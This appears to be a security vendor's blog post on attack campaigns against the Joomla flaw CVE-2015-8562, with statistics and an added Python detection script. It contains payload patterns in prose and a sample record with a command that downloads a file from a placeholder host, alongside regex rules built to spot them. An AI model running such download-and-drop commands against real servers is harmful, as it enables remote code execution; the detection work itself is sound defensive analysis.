Back in 2014, we predicted (for 2015) that most enterprises would largely lose their battle against the endless stream of patches required for their servers, driven by the exploding number of CVEs. 2015 has indeed been a record year for both the number of CVEs disclosed and the number of patches delivered. Just last week, we published a blog showing how SecureSphere WAF Virtual Patching is protecting applications in the wild. It is vacation time, with most folks out enjoying time off, but CVEs and bad actors don’t take vacations, so we are back here to share some of the key findings on the latest Joomla CVE. CVE-2015-8562 was yet another RCE (remote command execution) vulnerability that resulted in widespread blind scanning attacks similar to those seen with Shellshock.
On December 14th, 2015, the Joomla community released a new version (3.4.6), including a high-priority security fix for the remote command execution vulnerability CVE-2015-8562.
Interestingly, our generic anomaly detection mechanisms spotted the first attack attempts as early as December 10th, four days before the public release of the security fix.
A couple of hours after the publication of the fix, Imperva/Incapsula updated their Web Application Firewalls with custom mitigation to automatically detect and block attempts to exploit this vulnerability. Minutes after the new mitigation was placed, our WAF devices started identifying and blocking massive attack traffic from a large number of IP addresses. We collected the attack campaigns over several days and analyzed them, looking for the regular stuff: attack patterns, distribution of attack origins, attack velocity, and other attack characteristics. We reached two fascinating conclusions about the nature of these campaigns:
- “Blind” attacks: a mere 10% of the 8,000 hosts under attack were running Joomla, meaning that the vast majority of the attacks targeted non-vulnerable (non-Joomla) servers and were unlikely to succeed. This confirms the latest findings of our 2015 WAAR (Web Application Attack Report).
- Botnet attacks: the attacks originated from 11,000 source IPs, indicating that at least part of the attack campaigns were using botnets. Furthermore, we precisely identified attacks from IPs belonging to an active botnet we had detected and classified several months ago.
More interesting facts about these attacks, which can help in building mitigation for them:
- The preferred method of attack is POST.
- The top attacked URLs (~70%) are those usually used in typical Joomla deployments: “/home”, “/index.php”, “/joomla”, “/contact”.
- In addition to the payload in the headers, part of the attack vector was embedded in many fake parameters. The top five parameter names we saw were j00mla, Sf, fEdO, xUn, and PCXZ.
- The portion of reconnaissance vectors was fairly low: only 12% of the 32,000 attack attempts we saw, using PHP functions such as “echo”, “print” and “die”.
- The other 88% were actual attacks, in most cases masked with standard obfuscation measures aimed at bypassing basic monitoring. Some examples of the top attack payload patterns:
  - file_put_contents(…) + base64_decode(…)
  - system(…; curl -O http://…; …)
- The attacks are highly distributed, originating from virtually anywhere on the planet (see map below). However, as stated in the 2015 WAAR report, the United States leads in the number of attacking IPs, with 58% of the IPs residing in the US.
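As an added illustration (not code from this post or from Imperva), the following Python shows how the characteristics listed above can be turned into simple detection rules and campaign statistics, run over constructed sample request records. The parameter names, URLs and payload shapes follow the list above; the sample records, rule names and the record layout are assumptions.

```python
import re
from collections import Counter

# Constructed sample records (not real traffic from the post): what a WAF might
# log per request: method, path, and the parameter values it inspected.
SAMPLE = [
    {"method": "POST", "path": "/index.php", "params": {"j00mla": 'echo "ok";'}},
    {"method": "POST", "path": "/home",
     "params": {"Sf": 'file_put_contents("x.php", base64_decode("PD9waHA="));'}},
    {"method": "POST", "path": "/joomla",
     "params": {"fEdO": 'system("cd /tmp; curl -O http://example.invalid/x; ls");'}},
    {"method": "GET", "path": "/contact", "params": {"q": "print('1');"}},
    {"method": "GET", "path": "/about", "params": {"page": "2"}},
    {"method": "POST", "path": "/index.php", "params": {"xUn": "die(md5(1));"}},
]

# Rule order matters: attack patterns are tested before the reconnaissance
# rule, so a payload that both drops a file and echoes is counted as an attack.
PAYLOAD_RULES = [
    ("attack:file_put_contents+base64_decode",
     re.compile(r"file_put_contents\s*\(.*base64_decode\s*\(", re.I | re.S)),
    ("attack:system+curl",
     re.compile(r"system\s*\(.*\bcurl\s+-O\s+https?://", re.I | re.S)),
    ("recon", re.compile(r"\b(echo|print|die)\b\s*[(\s\"']", re.I)),
]
# Fake parameter names reported in the post (assumed here to be a good indicator).
FAKE_PARAMS = {"j00mla", "Sf", "fEdO", "xUn", "PCXZ"}


def classify(record):
    """Return the label of the first matching rule, or 'benign' if none match."""
    text = " ".join(record["params"].values())
    for label, rx in PAYLOAD_RULES:
        if rx.search(text):
            return label
    return "benign"


def summarize(records):
    """Aggregate the campaign characteristics the post reports over hostile
    records only: share of POST, top paths, recon/attack split, fake-param hits."""
    labels = Counter(classify(r) for r in records)
    hostile = [r for r in records if classify(r) != "benign"]
    return {
        "post_share": sum(r["method"] == "POST" for r in hostile) / len(hostile),
        "top_paths": Counter(r["path"] for r in hostile).most_common(3),
        "labels": dict(labels),
        "fake_param_hits": sum(1 for r in hostile if FAKE_PARAMS.intersection(r["params"])),
    }
```

On the constructed sample, 80% of hostile requests are POST, “/index.php” is the top path, three of five hostile requests are reconnaissance and four carry one of the known fake parameter names.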
There are two main takeaways from this Joomla attack campaign.
1) If you have any web presence, it is not a question of whether you will face attacks, but of when and how. You will get scanned with attack vectors, both blind and targeted, and some of them will get through if adequate security measures are not put in place right away.
2) The second takeaway stems from the short time (actually no time…) between the publication of a vulnerability and the moment we see it exploited in the wild. It is crucial to choose security products that have zero-day mitigation techniques as well as a research team that continuously monitors new attacks and updates the product. While it is practically impossible to deploy new versions/patches to production environments this fast, we have seen attackers becoming more agile than ever and adapting with new attacks of increasing amplitude.